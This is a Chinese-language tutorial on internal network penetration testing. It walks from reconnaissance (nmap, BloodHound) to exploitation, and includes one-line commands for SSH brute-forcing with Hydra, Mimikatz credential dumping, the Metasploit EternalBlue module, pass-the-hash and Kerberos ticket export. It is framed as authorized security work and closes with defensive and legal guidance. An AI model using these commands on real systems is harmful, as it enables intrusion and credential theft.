内网渗透基础（一）：从信息收集到漏洞利用的全流程解析

一、内网渗透的核心价值与适用场景

内网渗透测试是评估企业网络安全防护能力的关键手段，其核心目标是通过模拟攻击者视角，发现内部网络中存在的配置缺陷、权限管理漏洞及横向移动路径。相较于外网渗透，内网环境具有更高的权限敏感性和数据价值，攻击者一旦突破边界防护，可能直接获取核心业务系统权限。典型适用场景包括：红队攻防演练、企业安全自查、合规性审计（如等保2.0三级要求）及攻击面管理。

二、信息收集：构建内网攻击面地图

1. 网络拓扑分析

通过被动监听与主动探测结合的方式，绘制内网设备分布图。工具推荐：

• 被动监听：使用tcpdump或Wireshark捕获ARP请求、DHCP分配记录，识别存活主机MAC地址与IP映射关系。

  tcpdump -i eth0 -n arp

• 主动探测：Nmap扫描结合arp-scan，快速定位子网内活跃设备。

  nmap -sn 192.168.1.0/24  # ICMP Ping扫描
  arp-scan --localnet      # ARP协议探测

2. 端口与服务识别

针对关键系统（如域控、数据库、文件服务器）进行深度服务探测，重点关注：

• 高危端口：445（SMB）、3389（RDP）、135（RPC）、1433（SQL Server）
• 协议分析：使用nmap -sV识别服务版本，结合smbclient、sqlcmd等工具验证服务可用性。

  nmap -sV -p 445 192.168.1.100  # SMB服务版本探测
  smbclient -L //192.168.1.100    # 枚举共享目录

3. 域环境信息收集

若目标为域控环境，需重点收集以下信息：

• 域结构：通过net view /domain获取域列表，nltest /dsgetdc定位主域控。
• 用户与组：使用PowerView或BloodHound分析用户权限继承关系。

  # PowerView示例：枚举域管理员组
  Get-NetGroupMember -GroupName "Domain Admins" -Recurse

三、漏洞利用：从点到面的突破

1. 弱口令与默认凭证

针对管理后台、数据库、SSH等服务，使用字典攻击或默认密码列表进行尝试。工具推荐：

• Hydra：多协议暴力破解工具。

  hydra -L user.txt -P pass.txt ssh://192.168.1.100

• Mimikatz：提取本地或域内凭证（需管理员权限）。

  # 提取内存中的明文密码
  Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'

2. 已知漏洞利用

结合CVE编号与漏洞公告，选择适配的EXP脚本。例如：

• MS17-010（永恒之蓝）：通过msfconsole加载漏洞模块。

  use exploit/windows/smb/ms17_010_eternalblue
  set RHOSTS 192.168.1.100
  run

• WebLogic反序列化（CVE-2017-10271）：使用ysoserial生成Payload。

3. 横向移动技术

获取初始权限后，通过以下方法扩展控制范围：

• Pass the Hash：使用psexec或WMIC传递哈希值。

  # 使用哈希执行远程命令
  $hash = "AAD3B435B51404EEAAD3B435B51404EE:XXX"
  Invoke-TheHash -Target 192.168.1.200 -Username Administrator -Hash $hash -Command "whoami"

• 票据传递（Kerberos）：通过Rubeus或Mimikatz伪造TGT票据。

  # 导出当前用户票据
  Invoke-Mimikatz -Command '"kerberos::list /export"'

四、工具链与自动化框架

1. 渗透测试工具集

• 信息收集：Nmap、Masscan、BloodHound
• 漏洞利用：Metasploit、Cobalt Strike、PowerShell Empire
• 后渗透：Mimikatz、Procdump、SharpHound

2. 自动化框架示例

以Cobalt Strike为例，演示如何通过Beacon实现内网漫游：

1. 初始植入：通过钓鱼邮件或漏洞利用获取Beacon会话。
2. 端口转发：将内网服务映射到攻击机。

   # Cobalt Strike命令示例
   portfwd add -l 8080 -r 192.168.1.100 -p 80

3. 横向跳转：使用psexec_psh模块攻击其他主机。

五、防御建议与最佳实践

1. 最小权限原则：限制用户与服务的权限范围，避免使用域管理员账号日常操作。
2. 网络分段：通过VLAN或防火墙规则隔离关键业务系统。
3. 日志监控：部署SIEM系统（如Splunk、ELK）实时分析异常行为。
4. 定期审计：使用Ldapsearch或AdRecon检查域内权限配置。

六、法律与伦理边界

内网渗透测试必须获得书面授权，严格遵守《网络安全法》与《数据安全法》。测试过程中需避免：

• 篡改或删除业务数据
• 扩散测试工具至非授权环境
• 超出授权范围的攻击行为

结语

内网渗透是网络安全领域的高阶技能，要求渗透人员兼具技术深度与合规意识。本文从信息收集、漏洞利用到横向移动，系统梳理了内网渗透的核心流程，后续篇章将深入探讨权限维持、数据窃取等高级话题。安全从业者应始终以“防御视角”开展渗透测试，将发现的风险转化为可落地的加固方案。